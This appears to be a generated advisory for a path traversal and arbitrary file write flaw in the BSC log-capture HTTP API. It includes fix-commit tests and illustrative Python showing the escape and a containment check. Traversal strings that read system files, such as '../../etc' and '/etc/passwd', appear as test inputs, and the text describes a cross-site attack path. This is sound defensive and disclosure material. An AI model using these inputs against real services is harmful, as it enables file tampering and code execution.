    +                "path": "logs/capture",
    +            }
    +
    +            # Should not raise exception
    +            server._add_logger_by_name("valid")
    +
    +            # Verify logger was added
    +            assert "['127.0.0.1', 9000]" in lm._stream_capturers
    +
    +
    +class TestPathValidation:
    +    """Tests for path validation helper function"""
    +
    +    def test_validate_path_blocks_absolute_path_after_stripping(self):
    +        """Test that absolute paths get stripped but still validated"""
    +        # The function strips leading slashes, so "/etc/passwd" becomes "etc/passwd"
    +        # which is a valid relative path. To truly escape, you need ..
    +        result = bsc._validate_path_within_root("/tmp/bsc", "/etc/passwd")
    +        # After stripping, this becomes a valid path under /tmp/bsc
    +        real_root = os.path.realpath("/tmp/bsc")
    +        assert result.startswith(real_root)
    +
    +    def test_validate_path_blocks_parent_traversal(self):
    +        """Test that parent directory traversal is blocked"""
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc._validate_path_within_root("/tmp/bsc", "../../etc")
    +
    +    def test_validate_path_blocks_complex_traversal(self):
    +        """Test that complex traversal attempts are blocked"""
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc._validate_path_within_root("/tmp/bsc", "logs/../../../etc/passwd")
    +
    +    def test_validate_path_allows_valid_relative(self):
    +        """Test that valid relative paths are allowed"""
    +        result = bsc._validate_path_within_root("/tmp/bsc", "logs/capture", "test.pcap")
    +        # Use realpath for comparison since /tmp may be a symlink to /private/tmp on macOS
    +        real_root = os.path.realpath("/tmp/bsc")
    +        assert result.startswith(real_root)
    +        assert "logs/capture" in result or "logs\\capture" in result  # Cross-platform
    +        assert "test.pcap" in result
    +
    +    def test_validate_path_normalizes_result(self):
    +        """Test that paths are normalized correctly"""
    +        result = bsc._validate_path_within_root(
    +            "/tmp/bsc", "logs//nested/", "file.pcap"
    +        )
    +        # Should normalize multiple slashes
    +        assert "//" not in result
    +        # Use realpath for comparison since /tmp may be a symlink to /private/tmp on macOS
    +        real_root = os.path.realpath("/tmp/bsc")
    +        assert result.startswith(real_root)
    +
    +    def test_validate_path_expands_user_home(self):
    +        """Test that ~ expansion works for root"""
    +        home = os.path.expanduser("~")
    +        result = bsc._validate_path_within_root("~/test_root", "subdir")
    +        assert result.startswith(home)
    +        assert "test_root" in result
    

Vulnerability mechanics

Root cause

"The Binary Stream Capture (BSC) component does not validate path-related form fields, allowing path traversal and arbitrary file writes."

Attack vector

A remote attacker can send unauthenticated POST requests to the `/NAME/start` endpoint of the BSC HTTP API. By supplying crafted `path` and `log_dir_path` form fields, the attacker can make BSC append log data to arbitrary filesystem locations, bypassing the configured log root [ref_id=1]. Because the attacker controls the appended data, which can include executable code, this can lead to remote code execution if a modified file is later executed [ref_id=1]. The attack can be performed directly over the network or, when the BSC server is reachable from a user's browser (even if it listens only on localhost), through cross-site requests issued by JavaScript on an attacker-controlled web page [ref_id=1].

Affected code

The vulnerability exists in the `StreamCaptureManagerServer._add_logger_by_name` method, which handles requests to the `/NAME/start` endpoint. It passes attacker-controlled form fields, including `path` and `log_dir_path`, directly into `StreamCaptureManager.add_logger`. The `SocketStreamCapturer._get_log_file` method then constructs the log file path without proper validation, allowing path traversal. Finally, `_get_logger` opens the constructed file path in append mode without further safety checks.
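Why unvalidated path construction escapes the log root can be shown with a minimal sketch. The function `naive_log_path` below is a hypothetical stand-in, not the actual body of `_get_log_file`; it assumes only that the root, a user-supplied directory, and a file name are joined without checks. `posixpath` is used so the behavior is the same on every platform.

```python
import posixpath


def naive_log_path(root, user_path, filename):
    # Hypothetical illustration: join the configured root with an
    # attacker-supplied directory and perform no validation at all.
    return posixpath.normpath(posixpath.join(root, user_path, filename))


# An absolute component makes join() discard everything before it,
# so the configured root is silently dropped.
absolute_escape = naive_log_path("/tmp/bsc", "/etc", "capture.pcap")

# ".." components walk back out of the root once the path is normalized.
relative_escape = naive_log_path("/tmp/bsc", "../../etc", "capture.pcap")

print(absolute_escape)
print(relative_escape)
```

Both calls resolve to a location outside `/tmp/bsc`, which is why either an absolute value or a `..` sequence in a form field is enough to redirect the log file.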

What the fix does

The fix constrains BSC to write only to paths within the root log directory configured in `bsc.yaml`. Any attempt to traverse outside this location is now rejected, and the accompanying tests show that the `log_dir_path` form field is no longer accepted via the REST API. This prevents attackers from redirecting log output to arbitrary filesystem paths by manipulating form fields in API requests [ref_id=1].
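A containment check of this kind can be sketched as follows. This is an illustrative approximation based on the behavior the tests describe (leading slashes stripped, `~` expanded in the root, `ValueError` on escape), not the patch's actual `_validate_path_within_root` implementation; the name `resolve_under_root` and the use of `os.path.commonpath` are assumptions.

```python
import os


def resolve_under_root(root, *parts):
    """Hypothetical helper: resolve parts beneath root or raise ValueError."""
    # Resolve symlinks and "~" in the configured root first.
    real_root = os.path.realpath(os.path.expanduser(root))

    # Strip leading separators so absolute inputs are treated as relative.
    cleaned = [p.lstrip("/\\") for p in parts if p]

    # Resolve the candidate fully, collapsing ".." and following symlinks.
    candidate = os.path.realpath(os.path.join(real_root, *cleaned))

    # The candidate is contained only if the root is its common prefix
    # on a path-component basis (a plain string prefix test is weaker).
    if os.path.commonpath([real_root, candidate]) != real_root:
        raise ValueError("path must remain under root_log_directory")
    return candidate


safe = resolve_under_root("/tmp/bsc", "logs/capture", "test.pcap")
stripped = resolve_under_root("/tmp/bsc", "/etc/passwd")

try:
    resolve_under_root("/tmp/bsc", "logs/../../../etc/passwd")
    traversal_blocked = False
except ValueError:
    traversal_blocked = True
```

Comparing path components with `commonpath` rather than `str.startswith` avoids accepting a sibling directory such as `/tmp/bsc-other` as if it were inside `/tmp/bsc`.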

Preconditions

  • network: The attacker must have network access to the BSC HTTP API endpoint.
  • input: The attacker must be able to send crafted POST requests with specific form fields to the `/NAME/start` endpoint.

Reproduction

The PoC files `python_poc.py`, `attacker_tcp.py`, and `test1.html` demonstrate how to trigger this vulnerability. `python_poc.py` shows a direct network attack, while `attacker_tcp.py` and `test1.html` demonstrate an attack originating from a web browser targeting a local network service.

Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4
